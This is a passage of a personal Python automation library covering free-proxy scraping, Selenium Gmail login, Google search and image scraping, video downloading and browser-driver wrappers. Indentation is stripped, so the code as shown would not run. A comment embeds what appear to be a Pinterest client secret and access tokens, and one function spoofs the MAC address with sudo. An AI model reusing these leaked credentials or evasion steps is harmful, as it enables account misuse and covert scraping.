soup = BeautifulSoup(requests.get("http://www.idcloak.com/proxylist/free-us-proxy-list.html").text)
x = key("text", soup.findAll("td"))
y = []
for i in x:
try:
if i.count(".") == 3:
int(i.replace(".",""))
y.append(i)
else:
int(i)
y.append(i)
except:
pass
y = list(tcer(y))
proxy_list = []
for i,j in zip(y[0::2], y[1::2]):
proxy_list.append("%s:%s"%(i,j))
if random.randrange(1,3) == 1:
proxy_list = list(tcer(proxy_list))
else:
random.shuffle(proxy_list)
if len(proxy_list) == 0:
return get_us_ip_list()
return proxy_list
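# Illustrative use of get_us_ip_list, which scrapes free-proxy-list.net (falling back to idcloak)
# and returns shuffled "host:port" strings; it needs network access and the list changes per call.
"""
proxies = get_us_ip_list()
print(len(proxies), proxies[0])   # e.g. '123.45.67.89:8080'
"""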
def killall_phantomjs():
os.system("killall .phantomjs phantomjs &>/dev/null")
def login_gmail(ss, username, password):
logout_gmail(ss)
ss.get("https://accounts.google.com/ServiceLogin/identifier?service=mail&passive=true&rm=false&continue=https%3A%2F%2Fmail.google.com%2Fmail%2F&ss=1&scc=1<mpl=default<mplcache=2&emr=1&osid=1&flowName=GlifWebSignIn&flowEntry=AddSession")
flexed = False
quas = ss.ffss("div", "aria-label", "Switch account")
if([] != quas):
flexed = True
if flexed == True:
trykeycall("click", quas); sp(10)
trykeycall("click", ss.ffsts("div", "Use another account")); sp(7)
1
trykeycall("send_keys", ss.fns("identifier"), username); sp(7)
trykeycall("click", ss.ffsts("span", "Next")); sp(4)
while("/pwd" not in ss.current_url):
time.sleep(1)
trykeycall("send_keys", ss.fns("password"), password); sp(7)
current_url = ss.current_url
trykeycall("click", ss.ffsts("span", "Next")); sp(7)
while(current_url == (lambda: ss.current_url)()):
time.sleep(1)
time.sleep(10)
if("/challenge" in ss.current_url):
OSA.display_dialog("Please fill in the six digit verification code. Then click OK in this prompt.", text_prompt = False)
trykeycall("click", ss.ffsts("span", "Next")); sp(6)
def logout_gmail(ss):
ss.get("https://accounts.google.com/Logout")
def query_google(q, pages):
urls = ["https://www.google.com/search?q={}&oq={}&start={}".format(q,q, i*10) for i in range(pages)]
print(urls)
x=[]
for idx, url in enumerate(urls):
print("getting page %s.." % idx)
try:soup = BeautifulSoup(requests.get(url).text)
except Exception as e: redprint("[query_google][%s]"%e); continue
results = re.findall(r'<a href="/url\?q=(.*?)"', str(soup))
for i in results:
if i not in x:
x.append(i)
time.sleep(2)
print("%s results so far" % len(x))
x1 = []
for url in x:
x1.append(url.split("&")[0])
return x1
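# An illustrative call: query_google scrapes result links from the given number of Google result
# pages (10 results per page, with a 2 second pause between pages) and returns them with the
# trailing tracking parameters stripped. The query string is only an example.
"""
urls = query_google("aliexpress phone case", 2)
print(len(urls), urls[:3])
"""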
def query_google_images(searches="", limit=20):
for i in searches.split(","):
rm(homepath("~/Documents/downloads"))
rm(homepath("~/Documents/photos/%s"%(i)))
os.chdir(homepath("~/Documents"))
os.system('googleimagesdownload --chromedriver ~/tavern/tavern/soda/.chromedriver -k """%s""" -l %s'%(i.strip(), limit))
os.system("mkdir ~/Documents/photos &>/dev/null")
os.system("""mv ./downloads/* /Users/$USER/Documents/photos/ && mv ./downloads/*/* "/Users/$USER/Documents/photos/%s/" """%(i))
os.system("echo 'printing image folders in ~/Documents/photos..'")
os.system("ls -l ~/Documents/photos | grep -v 'jpg\|png\|jpeg\|psd'")
rm("./downloads")
return flatten([lmap(lambda x: homepath("~/Documents/photos/%s/%s"%(i,x)),os.listdir(homepath("~/Documents/photos/%s"%(i)))) for i in searches.split(",")],1)
def r_image_search(io,webbrowser_open=False):
import webbrowser
if type(io) != list:
io = [io]
def x(address):
multipart = {"encoded_image": open(address, "rb"), "image_content": ""}
response = requests.post("http://www.google.com/searchbyimage/upload", files=multipart, allow_redirects=False)
fetchUrl = response.headers["Location"]
url = fetchUrl + "&q=site%3Aaliexpress.com"
return url
l=pool(x,io,nodes=2).result()
if webbrowser_open == True:
if OSA.log("Are you sure you want to open the urls?",tp=False,buttons=["Yes","No"]) == "Yes":
lmap(webbrowser.open,l)
return l
def read_html(url, to_dict=True):
import pandas as pd
dataframes = pd.read_html(url, header=0)
dataframes=[dataframe_to_dictlist(dataframe) for dataframe in dataframes]if(1==to_dict)else(dataframes)
return dataframes
def reverse_image_search(io,search=None):
try:
# for segmentation fault
if not os.path.exists(io):
io = Images().download(io)
# filePath = '/mnt/Images/test.png'
searchUrl = 'http://www.google.com/searchbyimage/upload'
multipart = {'encoded_image': (io, open(io, 'rb')), 'image_content': ''}
response = requests.post(searchUrl, files=multipart, allow_redirects=False)
url = response.headers['Location']
if search:
url = url + "&q=%s&oq=%s"%(search,search)
return url
except Exception as e:
OSA.notify("reverse image search error: %s" % str(e))
return reverse_image_search(io=io,search=search)
def run_pinterest_board_image_getter():
# 'https://api.pinterest.com/oauth/?scope=read_public,write_public&client_id=5066656475317842279&state=768uyFys&response_type=code&redirect_uri=https://localhost/auth/pinterest/callback\nhttps://localhost/auth/pinterest/callback?state=768uyFys&code=de928c1c929e5c05\n\n\ndata={"grant_type":"authorization_code",\n"client_id":5066656475317842279,\n"client_secret":"84a1b5a0d3c5fc58fdbf7238902330d042ff2dfcf997c3ee2013c0408b03bb8e",\n"code":"d2021af082c74329",}\nx=requests.post("https://api.pinterest.com/v1/oauth/token",data=data)\n#y=\'{"access_token": "An0Xs7HN42Vf6UlX72a-KVcHjQahFdfH1Ef4bCxGUGE4UkCxZwhtQDAAAsw9RlBjTAqAq3MAAAAA", "token_type": "bearer", "scope": ["read_public", "write_public", "read_private", "write_private", "read_write_all"]}\'\ndata = json.loads(x.text)\naccess_token = data["access_token"]\n\nhttps://api.pinterest.com/v1/boards/396035429671343708/pins/?access_token=An8K8wKh3MUU2SX8uNNQh4I42w_1FcKm1yR6NIlGJA_4Q6Ckiwj7gDAAAqv1RiQTFyGAsh0AAAAA&fields=id%2Clink%2Cnote%2Curl%2Cattribution%2Cboard\n\n\n\nparams = {"access_token":access_token,"fields":["image","note"]}\nr = requests.get("https://api.pinterest.com/v1/boards/whitetiger62/steampunk-girl/pins/",params=params)\nall_data = []\ndata = json.loads(r.text)\nall_data.extend(data["data"])\nwhile "next" in data.get("page",{}):\n r = requests.get(data["page"]["next"])\n data = json.loads(r.text)\n all_data.extend(data["data"])\n print(data)\n time.sleep(1)\n\n\nrequests.get("https://api.pinterest.com/v1/me/pins/?access_token=%s&fields=id,note&limit=1"%(access_token))\n\nrequests.get("https://api.pinterest.com/v1/boards/anapinskywalker/wanderlust/pins/?access_token=%s&limit=2&fields=id,link,counts,note"%(access_token))\n'
process(lambda:OSA.log("x=document.getElementsByTagName('img');y=x.length;l=[];for (i=0;i<y;i++) {l=l.concat(x[i].src);};console.log(l.length);copy(l.join());"))
datas = []
while True:
if pyperclip.paste() not in datas:
datas.append(pyperclip.paste())
if pyperclip.paste() == "end":
break
datas = listminus(datas,None)
datas = oset(flatten(lmap(lambda i:i.split(","),sudby(lambda i:i.endswith("jpg"),datas)),1))
datas = datas[1:]
datas = lmap(lambda i:re.sub("(https://i.pinimg.com/)\d+x(.*)","\\g<1>1200x\\g<2>",i),datas)
datas = [i for i in datas if re.findall("https://i.pinimg.com/\d+x\d+_RS",i) == []]
# file_links = pool(lambda i: Images().download(i),datas,nodes=24)
return datas
def site_speed_test(shop):
"""
In [4]: @timeit
...: def timed():
...: requests.get("https://%s"%Shop()(shop).Domain_Name)
...:
...:
In [5]: timed()
timeit: 2.1305429935455322, timed
In [6]: timed()
timeit: 0.7816150188446045, timed
"""
@timeit
def timed():
requests.get("https://%s"%Shop()(shop).Domain_Name)
timed()
return
def socket_connect_send(host_and_port=("data.pr4e.org", 80),url="http://data.pr4e.org/romeo.txt"):
import socket
mysock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
mysock.connect(host_and_port)
cmd = ("GET %s HTTP/1.0\r\n\r\n"%(url)).encode()
mysock.send(cmd)
while True:
data = mysock.recv(512)
if (len(data) < 1):
break
print(data.decode())
mysock.close()
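# Example usage (sketch): issues a bare HTTP/1.0 GET over a raw socket and prints the raw
# response (status line, headers, body). The defaults above already point at the sample
# host/file, so both calls below are equivalent:
#   socket_connect_send()
#   socket_connect_send(("data.pr4e.org", 80), "http://data.pr4e.org/romeo.txt")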
def urllib_video_download(x):
    import urllib.request
y = get_random_address(homepath("~/tavern/tavern/soda/dls")).mp4()
urllib.request.urlretrieve(x, y)
return y
def video_download(x):
print("Downloading Video")
timer = multiprocessing_process(lambda: [[OSA.notify(str(i)),time.sleep(1)] for i in range(WHILE_TRUE)])
y = get_random_address(homepath("~/tavern/tavern/soda/dls")).mp4()
timedretry(lambda: os.system("wget -O '%s' '%s'"%(y,x)),80)
tryprocess(lambda: timer.terminate())
return y
def youtube_downloader(y="asdf",z=20):
os.makedirs(homepath("~/Documents/%s"%(y)),exist_ok=True)
os.chdir(homepath("~/Documents/%s"%(y)))
x=getoutput("youtube-dl --get-title --get-url ytsearch%s:%s"%(z,y)).split("\n")
titles = x[0::3]
urls = x[2::3]
titles = lmap(lambda i: i.title(), titles)
x = []
for title, url in zip(titles, urls):
if ner_tagger(title):
pass
else:
cmd = "youtube-dl '%s' --output '%s.mp4' &"%(url,title)
print(cmd)
                # bind url/title as default arguments so each queued lambda keeps its own values
                x.append(lambda url=url, title=title: os.system("youtube-dl '%s' --output '%s.mp4' &"%(url,title)))
pool(lambda i: i.__call__(), x, nodes=5).result()
def change_mac_address():
mac_address = subprocess.getoutput("openssl rand -hex 6 | sed 's/\(..\)/\\1:/g; s/.$//'")
os.system("sudo ifconfig en0 ether %s"%(mac_address))
class Bowser(object):
def __call__(self, profile="sele", invis=False, window_index=None):
distinct_print("initializing profile %s" % profile)
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.firefox.firefox_profile import FirefoxProfile
from selenium.webdriver.firefox.firefox_binary import FirefoxBinary
from selenium.webdriver.common.keys import Keys, Keys as SHADOW
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.options import Options
from selenium.webdriver import ActionChains
from selenium import webdriver
from pyvirtualdisplay import Display
from selenium.webdriver.common.alert import Alert
from sys import platform
import selenium.webdriver.support.expected_conditions as EC
globals().update({a:v for a,v in Keys.__dict__.items() if not a.startswith("_")})
globals().update(locals())
wd = None
if invis == True:
display = Display(visible=0, size=(1024, 768)).start()
if profile == 'ph':
#@service_log_path somewhere else [2018.11.23 05:07 PM]
wd = webdriver.PhantomJS(os.path.expanduser('~/tavern/tavern/soda/.phantomjs'),service_log_path=homepath("~/tavern/tavern/soda/.ghostdriver.log"))
(wd.set_window_position(*GLOBAL_BROWSER_WINDOW_POSITION), wd.set_window_size(*GLOBAL_BROWSER_WINDOW_SIZE))
wd.profile = "sele" # false but slips
wd.driver_type = "phantomjs"
if 'ch' in profile:
# os.system("rm -rf '~/Library/Application Support/Google/Chrome/Profile 1000'")
os.system("killall Google\ Chrome\ 70&>/dev/null&")
options = webdriver.ChromeOptions()
options.add_argument("--no-sandbox")
options.add_argument("--user-data-dir=~/Library/Application Support/Google/Chrome/Profile 1000")
options.add_argument("disable-infobars")
options.add_argument('--disable-infobars')
options.add_argument("--disable-infobars")
os.system("rm -rf ~/Library/Application\ Support/Google/Chrome/Profile\ 1000/Cookies")
OSA().notify("initiating webdriver")
options.binary_location = '/Applications/Google Chrome 70.app/Contents/MacOS/Google Chrome'
options.add_argument("--disable-dev-shm-usage");
# killall "Google Chrome 70"
# options.add_argument('window-size=1200x600')
chromedriver = os.path.expanduser('~/tavern/tavern/soda/.chromedriver')
if '+' in profile:
rm(homepath("~/Library/Application Support/Google/Chrome/Profile 1000"))
options.add_argument('--headless')
if '/' in profile:
rm(homepath("~/Library/Application Support/Google/Chrome/Profile 1000"))
wd = webdriver.Chrome(executable_path=chromedriver, chrome_options=options)
(wd.set_window_position(*GLOBAL_BROWSER_WINDOW_POSITION), wd.set_window_size(*GLOBAL_BROWSER_WINDOW_SIZE))
wd.profile = profile
wd.driver_type = "chrome"
elif profile != 'ph':
try:
if platform == 'darwin':
profile_path = os.path.expanduser("~/Library/Application Support/Firefox/Profiles")
else:
profile_path = os.path.expanduser('~/.mozilla/firefox')
#options = Options()
#options.add_argument("--headless")
#options.set_headless(headless=True)
# 3.14.1, 65/61, 24
# 2.53.1, 46, 19? (24*)
# 46 ruled as screenshot savely and zoomable
executable_path = os.path.expanduser("~/tavern/tavern/soda/.geckodriver")
#firefox_profile = FirefoxProfile(os.path.expanduser("~/Library/Application Support/Firefox/Profiles") + "/" + [i for i in os.listdir(os.path.expanduser("~/Library/Application Support/Firefox/Profiles"))][0])
firefox_profile = FirefoxProfile(homepath("~/Library/Application Support/Firefox/Profiles/%s" % (( [i for i in os.listdir(os.path.expanduser("~/Library/Application Support/Firefox/Profiles")) if profile == "".join(i.split(".")[1:]) ][0] )) ))
#firefox_profile.set_preference('browser.download.dir', '/tmp')
firefox_profile.set_preference('browser.helperApps.neverAsk.saveToDisk', 'text/csv; charset=utf-8')
firefox_profile.set_preference('browser.helperApps.neverAsk.saveToDisk', 'text/json; charset=utf-8')
firefox_profile.set_preference('browser.helperApps.neverAsk.saveToDisk', 'text/plain; charset=utf-8')
firefox_profile.set_preference('browser.helperApps.neverAsk.saveToDisk', 'text/html; charset=utf-8')
firefox_profile.set_preference('browser.helperApps.neverAsk.saveToDisk', 'text/csv')
firefox_profile.set_preference('browser.helperApps.neverAsk.saveToDisk', 'text/json')
firefox_profile.set_preference('browser.helperApps.neverAsk.saveToDisk', 'text/plain')
firefox_profile.set_preference('browser.helperApps.neverAsk.saveToDisk', 'text/html')
firefox_profile.set_preference('browser.helperApps.neverAsk.saveToDisk', 'attachment/json')
firefox_profile.set_preference('browser.helperApps.neverAsk.saveToDisk', 'attachment/json; charset=utf-8')
firefox_profile.set_preference('browser.helperApps.neverAsk.saveToDisk', 'attachment/json;charset=utf-8')
firefox_binary = FirefoxBinary("/Applications/Firefox 46.app/Contents/MacOS/firefox-bin") # Make sure selenium is 3.8.0
# firefox_binary = FirefoxBinary("/Applications/Firefox 46.app/Contents/MacOS/firefox-bin") # Make sure selenium is 2.53.1
wd = webdriver.Firefox(executable_path=executable_path, firefox_profile=firefox_profile, firefox_binary=firefox_binary)if(invis!=66)else(webdriver.Firefox(executable_path=executable_path,firefox_profile=firefox_profile,firefox_binary=FirefoxBinary("/Applications/Firefox 46.app/Contents/MacOS/firefox-bin".replace("46","66")), log_path="/dev/null"))#,capabilities=capabilities)
(wd.set_window_position(*GLOBAL_BROWSER_WINDOW_POSITION), wd.set_window_size(*GLOBAL_BROWSER_WINDOW_SIZE))
wd.driver_type = "firefox"
# HERE IS THE PAYLOAD
#if invis: OSA().setforemostwindowarrangement("Firefox",0,0,0,0)
from selenium.webdriver.common.keys import Keys
wd.keys = Keys
except Exception as e:
print(e)
o = lambda self: [blueprint("imko_checker on"), setattr(self, "imko_checker", True), self][2]
k = lambda self: [blueprint("imko_checker off"), setattr(self, "imko_checker", False), self][2]
def imko(self, *args, part = 0):
return self
            # [Deprecated]: the code below the early return above is unreachable and kept for reference
if len(args) > 1: part = args[-1]
self.zoom_level()
if part == "on":
self.imko_checker = True
return self
elif part == "off":
self.imko_checker = False
return self
if args: return [[greenprint("Image compare test passed.")]if(True==[self.save_screenshot("%s/%s%s.png"%(homepath("~/tavern/tavern/soda/imqo"),addressurl(args[0],part=part),"_:compare:_")), ImageComp()("%s/%s"%(homepath("~/tavern/tavern/soda/imqo"), addressurl(args[0],part=part)), "%s/%s%s.png"%(homepath("~/tavern/tavern/soda/imqo"),addressurl(args[0],part=part),"_:compare:_"))][1] )else([greenprint("Image compare test failed."), OSA.display_dialog("This page with url:\n%s\n failed the image compare test. It may have been changed.\nThis test was taken with a similarity metric of %s.\n\nContinue? (may result in program crash)" % (self.current_url, GLOBAL_IMAGE_COMPARISON_TEST_SCORE), text_prompt = False)]), self][1]
address_current = addressurl(self.current_url, part = part)
address_imqo = homepath("~/tavern/tavern/soda/imqo")
destination_locale = "%s/%s" % (address_imqo, address_current)
assert os.path.exists(destination_locale)
compare_locale = "%s%s.png" % (destination_locale, "_:compare:_") # gen new
self.save_screenshot(compare_locale) # save
image_compare_test_result = ImageComp()(destination_locale, compare_locale)
os.remove(compare_locale)
# :image_compare_test:
if True == image_compare_test_result:
greenprint("Image compare test passed.")
else:
greenprint("Image compare test failed.")
OSA.display_dialog("This page with url:\n%s\n failed the image compare test. It may have been changed.\nThis test was taken with a similarity metric of %s.\n\nContinue? (may result in program crash)" % (self.current_url, GLOBAL_IMAGE_COMPARISON_TEST_SCORE), text_prompt = False)
return self
def silver_port(self, executable_string):
os.system("pip install selenium==3.14.1 && cd ~/tavern/tavern && ~/tavern/bin/python3.5 -c 'from soda.can import *; %s' ; pip install selenium==2.53.1" % (executable_string))
return self
def set_window(self, x,y,l,w):
self.set_window_position(y, x)
self.set_window_size(l, w)
return self
def set_window_index(self, row, col, num_rows=4, num_cols=4):
self.get('http://google.com')
if self.profile == 'ch':
self.execute_script("document.body.style.zoom='25%'")
else:
self.zoom_out()
row_size = 4000/num_rows
col_size = 6400/num_cols
if self.profile == 'ch':
row_size = (row_size / 4) *1.2
if self.profile == 'ch':
col_size = (col_size / 4) *1.2
x_position = row_size * row
y_position = col_size * col
x_size = row_size
y_size = col_size
print(x_position, y_position, x_size, y_size)
self.set_window(x_position, y_position, y_size, x_size)
return self
def click_by_offset(self, element, x, y):
ActionChains(self).move_to_element_with_offset(element, x, y).click().perform()
return self
def cget(self,url):
self.execute_script("window.open('%s', 'new_window')"%url)
self.switchlast()
return self
def switchlast(self):
self.switch_to_window(self.window_handles[-1])
return self
def closelast(self):
self.switchlast()
self.close()
self.switchlast()
return self
def nexturlwait(self):
self.nexturlwait_current = self.current_url
return self
def nexturlwaitjoin(self, _time = GLOBAL_BROWSER_URLWAIT_WAIT_TIME):
start_time = datetime.now()
while self.current_url == self.nexturlwait_current:
if ((datetime.now()-start_time).seconds) > _time: assert(False)
time.sleep(0.5)
self.zoom_level(level = self.zoom_level_idx)
self.sp(GLOBAL_BROWSER_STEP_SLEEPTIME)
return self
def urlwait(self, x, _time = GLOBAL_BROWSER_URLWAIT_WAIT_TIME):
start_time = datetime.now()
while(x not in self.current_url):
if ((datetime.now()-start_time).seconds) > _time: assert(False)
time.sleep(0.5)
self.zoom_level(level = self.zoom_level_idx)
self.sp(GLOBAL_BROWSER_STEP_SLEEPTIME)
return self
def assert_connection_speed(self, minimum_speed = "25MB"):
minimum_speed_integer = decimal_re(minimum_speed)
download_speed_readable = Psutil().SpeedTest(download = True, upload = False, verbose = False)
download_speed_integer = decimal_re(download_speed_readable)
while download_speed_integer < minimum_speed_integer:
download_speed_readable = Psutil().SpeedTest(download = True, upload = False, verbose = False)
download_speed_integer = decimal_re(download_speed_readable)
OSA.display_dialog("Browser is not working because download speed is not over the minimum speed which is %s.\nPressing Okay will re-attempt this download speed test." % (minimum_speed))
greenprint("Download Speed, %s Is Over %s. Connection Speed Is Good" % (download_speed_readable, minimum_speed))
return True
if GLOBAL_BROWSER_REQUIRE_SPEEDTEST == True:
speedtest = pool(type("", (AttrDict,), dict(assert_connection_speed = assert_connection_speed))().assert_connection_speed, minimum_speed = "200MB")
def iframe_find(self, command, *args, **kwargs):
iframes = self.ftns("iframe")
for i in iframes:
try:
time.sleep(3)
self.switch_to_frame(i)
time.sleep(3)
except Exception as e:
redprint("could not switch to a frame, switching to default content and continuing.")
time.sleep(3)
self.switch_to_default_content()
time.sleep(3)
continue
pass
R = tryreturn(command, *args, **kwargs)
if R == 0:
print("could not execute the command with the args and kwargs, switching to default content and continuing.")
time.sleep(3)
self.switch_to_default_content()
time.sleep(3)
continue
elif R != 0:
time.sleep(3)
self.switch_to_default_content()
time.sleep(3)
                    return R
time.sleep(3)
self.switch_to_default_content()
time.sleep(3)
def wait_for(self, _type,_name,_time=GLOBAL_BROWSER_ELEMENT_WAIT_TIME):
            try: return WebDriverWait(self,_time).until(EC.presence_of_element_located((getattr(By, _type), _name)))
except: print('[Disregardable] %s Not Found'%_name); return 'fail'
def wait_fors(self, _type,_name,_time=GLOBAL_BROWSER_ELEMENT_WAIT_TIME):
            try: return WebDriverWait(self,_time).until(EC.presence_of_all_elements_located((getattr(By, _type), _name)))
except: print('[Disregardable] %s Not Found'%_name); return []
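        # Example (sketch): wait_for/wait_fors take the name of a selenium `By` attribute plus a
        # locator; assuming `ss` is a driver returned by Bowser()(...) as in the notes below:
        #   elem = ss.wait_for("CSS_SELECTOR", "input[name='q']")
        #   elems = ss.wait_fors("TAG_NAME", "a")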
def wait_for_element(self, method, *args):
while True:
try:
x = method(*list(args))
if x != "fail":
return x
except Exception as e:
print(method, *args, "not found", "sleeping 1")
time.sleep(1)
# ie self.ss.fcn, "s-company-title"
# send_keys/click should be classed to return self
def bind_more(elem, webdriver = None):
if type(elem)==str: return "fail"
elem.find_element_by_class_name1 = elem.find_element_by_class_name
find_element_by_class_name = lambda self, x, **kwargs: [setitem(kwargs, "hotspot", bind_more(self.find_element_by_class_name1(x), webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
elem.find_element_by_css_selector1 = elem.find_element_by_css_selector
find_element_by_css_selector = lambda self, x, **kwargs: [setitem(kwargs, "hotspot", bind_more(self.find_element_by_css_selector1(x), webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
elem.find_element_by_id1 = elem.find_element_by_id
find_element_by_id = lambda self, x, **kwargs: [setitem(kwargs, "hotspot", bind_more(self.find_element_by_id1(x), webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
elem.find_element_by_link_text1 = elem.find_element_by_link_text
find_element_by_link_text = lambda self, x, **kwargs: [setitem(kwargs, "hotspot", bind_more(self.find_element_by_link_text1(x), webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
elem.find_element_by_name1 = elem.find_element_by_name
find_element_by_name = lambda self, x, **kwargs: [setitem(kwargs, "hotspot", bind_more(self.find_element_by_name1(x), webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
elem.find_element_by_partial_link_text1 = elem.find_element_by_partial_link_text
find_element_by_partial_link_text = lambda self, x, **kwargs: [setitem(kwargs, "hotspot", bind_more(self.find_element_by_partial_link_text1(x), webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
elem.find_element_by_tag_name1 = elem.find_element_by_tag_name
find_element_by_tag_name = lambda self, x, **kwargs: [setitem(kwargs, "hotspot", bind_more(self.find_element_by_tag_name1(x), webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
elem.find_element_by_xpath1 = elem.find_element_by_xpath
find_element_by_xpath = lambda self, x, **kwargs: [setitem(kwargs, "hotspot", bind_more(self.find_element_by_xpath1(x), webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
elem.find_elements_by_class_name1 = elem.find_elements_by_class_name
find_elements_by_class_name = lambda self, x, **kwargs: [setitem(kwargs, "hotspot", binded_list(self.find_elements_by_class_name1(x))(webdriver = webdriver)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
elem.find_elements_by_css_selector1 = elem.find_elements_by_css_selector
find_elements_by_css_selector = lambda self, x, **kwargs: [setitem(kwargs, "hotspot", binded_list(self.find_elements_by_css_selector1(x))(webdriver = webdriver)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
elem.find_elements_by_id1 = elem.find_elements_by_id
find_elements_by_id = lambda self, x, **kwargs: [setitem(kwargs, "hotspot", binded_list(self.find_elements_by_id1(x))(webdriver = webdriver)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
elem.find_elements_by_link_text1 = elem.find_elements_by_link_text
find_elements_by_link_text = lambda self, x, **kwargs: [setitem(kwargs, "hotspot", binded_list(self.find_elements_by_link_text1(x))(webdriver = webdriver)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
elem.find_elements_by_name1 = elem.find_elements_by_name
find_elements_by_name = lambda self, x, **kwargs: [setitem(kwargs, "hotspot", binded_list(self.find_elements_by_name1(x))(webdriver = webdriver)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
elem.find_elements_by_partial_link_text1 = elem.find_elements_by_partial_link_text
find_elements_by_partial_link_text = lambda self, x, **kwargs: [setitem(kwargs, "hotspot", binded_list(self.find_elements_by_partial_link_text1(x))(webdriver = webdriver)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
elem.find_elements_by_tag_name1 = elem.find_elements_by_tag_name
find_elements_by_tag_name = lambda self, x, **kwargs: [setitem(kwargs, "hotspot", binded_list(self.find_elements_by_tag_name1(x))(webdriver = webdriver)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
elem.find_elements_by_xpath1 = elem.find_elements_by_xpath
find_elements_by_xpath = lambda self, x, **kwargs: [setitem(kwargs, "hotspot", binded_list(self.find_elements_by_xpath1(x))(webdriver = webdriver)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
elem.click1 = elem.click
click = lambda self, sleeptime = GLOBAL_BROWSER_STEP_SLEEPTIME: [elem.click1(), webdriver.sp(sleeptime), webdriver][2]
elem.send_keys1 = elem.send_keys
send_keys = lambda self, keys, sleeptime = GLOBAL_BROWSER_STEP_SLEEPTIME: [tryprocess(elem.clear), webdriver.sp(sleeptime), elem.send_keys1(keys), webdriver.sp(sleeptime), self][4]
elem.clear1 = elem.clear
s_keys = lambda self,x,r1=0.2,r2=0.8,sleeptime=GLOBAL_BROWSER_STEP_SLEEPTIME: [[tryprocess(elem.clear), time.sleep(sleeptime), time.sleep(1), [[elem.send_keys1(i), time.sleep(random.uniform(r1,r2))] for i in x]], self.sp(sleeptime), self][2]
"""
ss = Browser()("sele")
ss.get("google.com")
ss.fcss(".gLFyf").s_keys("RR")
"""
clear = lambda self: [elem.clear1(), self][1]
for k,v in locals().items():
try: bind(elem, k, v)
except: pass
for i in dir(webdriver):
if not i.startswith("_"):
if not i.startswith("find"):
if not i == "s_keys":
tryprocess(setattr, elem, i, tryreturn(getattr, webdriver, i))
# [don't do this, it sets the find_elements, wait, that uses ftn, etc, so none other collide]
return elem
"""
ss = Bowser()("ch")
ss.get("google.com")
a = ss.ftn("body")
assert ss == a.click()
"""
"""
ss = Browser()("sele")
ss.get("google.com").bat()
ss.ftns("input").ftns("input")
ss.bat("A", "B")
ss.batterypack
"""
actionitem = lambda self: self
bat = lambda self, *args, batterysleep_time = GLOBAL_BROWSER_STEP_SLEEPTIME: [setattr(self, "batterypack", []), setattr(self, "batterysleep", batterysleep_time), self][2] if len(args) == 0 else [[[self.batterypack[idx].click() if i=="Click" else self.nexturlwait() if i == "Nexturlwait" else self.nexturlwaitjoin() if i == "Nexturlwaitjoin" else () if i == Null else self.batterypack[idx].send_keys(i), self.sp(self.batterysleep)] for idx, i in enum(args)], self][1]
atomicdialog = lambda self, x, method: [OSA.display_dialog(x, text_prompt = False) if True == method() else 1, self][1]
binded_list = type("", (list,), dict(__call__ = lambda self, webdriver: [setattr(self, "ss", webdriver),self.ora(),(self)if(self!=["f","a","i","l"])else("fail")][2], click = lambda self, sleeptime = GLOBAL_BROWSER_STEP_SLEEPTIME: [binded_list(trykeycall("click", self))(webdriver = self.ss), self.sp(sleeptime)][0], send_keys = lambda self, keys, sleeptime = GLOBAL_BROWSER_STEP_SLEEPTIME: [trykeycall("clear", self), self.sp(sleeptime), binded_list(trykeycall("send_keys", self, keys))(webdriver = self.ss), self.sp(sleeptime)][2], s_keys = lambda self, keys, r1 = 0.2, r2 = 0.7, sleeptime = GLOBAL_BROWSER_STEP_SLEEPTIME: [[trykeycall("clear", self), self.sp(sleeptime), binded_list([[[tryprocess(elem.send_keys, i), time.sleep(random.uniform(r1, r2))][0] for i in keys] for elem in self])(webdriver = self)][2], self.sp(sleeptime)][0], clear = lambda self, sleeptime = GLOBAL_BROWSER_STEP_SLEEPTIME: [binded_list(trykeycall("clear", self))(webdriver = self.ss), self.sp(sleeptime)][0], ora = lambda self: [tryprocess(setattr, self, i, tryreturn(getattr, self.ss, i)) for i in dir(self.ss) if not i.startswith("_") and i != "s_keys"])) # could be just and i != "s_keys" # or... and i not in dir(self) # less risk
fcn = lambda self, Elem, _time=GLOBAL_BROWSER_ELEMENT_WAIT_TIME, **kwargs: [setitem(kwargs, "hotspot", bind_more(self.wait_for('CLASS_NAME', Elem, _time=_time), webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
fcss = lambda self, Elem, _time=GLOBAL_BROWSER_ELEMENT_WAIT_TIME, **kwargs: [setitem(kwargs, "hotspot", bind_more(self.wait_for('CSS_SELECTOR', Elem, _time=_time), webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
fid = lambda self, Elem, _time=GLOBAL_BROWSER_ELEMENT_WAIT_TIME, **kwargs: [setitem(kwargs, "hotspot", bind_more(self.wait_for('ID', Elem, _time=_time), webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
flt = lambda self, Elem, _time=GLOBAL_BROWSER_ELEMENT_WAIT_TIME, **kwargs: [setitem(kwargs, "hotspot", bind_more(self.wait_for('LINK_TEXT', Elem, _time=_time), webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
